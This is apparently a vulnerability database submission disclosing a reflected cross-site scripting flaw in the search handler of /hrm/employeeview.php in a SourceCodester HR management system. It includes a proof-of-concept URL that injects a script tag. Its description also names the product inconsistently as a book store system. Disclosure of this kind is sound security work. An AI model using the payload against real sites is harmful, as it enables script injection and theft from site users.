| Title | Human Resource Management System 1.0 Reflected XSS |
|---|
| Description | Description: Vulnerability was found in SourceCodester Book Store Management System 1.0. A Reflected cross-site scripting (XSS) vulnerability in /hrm/employeeview.php with search handler.
The product(s): https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
Affected component(s): /hrm/employeeview.php
Proof of Concept:
http://localhost/hrm/employeeview.php?searchview=Submit+Query&search=sss%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cinput |
|---|
| Source | ⚠️ https://github.com/leecybersec/bug-report/tree/main/sourcecodester/oretnom23/hrm/employee-view-xss |
|---|
| User | leecybersec (UID 36724) |
|---|
| Submission | 12/02/2022 08:08 (3 years ago) |
|---|
| Moderation | 12/03/2022 17:19 (1 day later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 214776 [SourceCodester Human Resource Management System 1.0 /hrm/employeeview.php Search cross site scripting] |
|---|
| Points | 20 |
|---|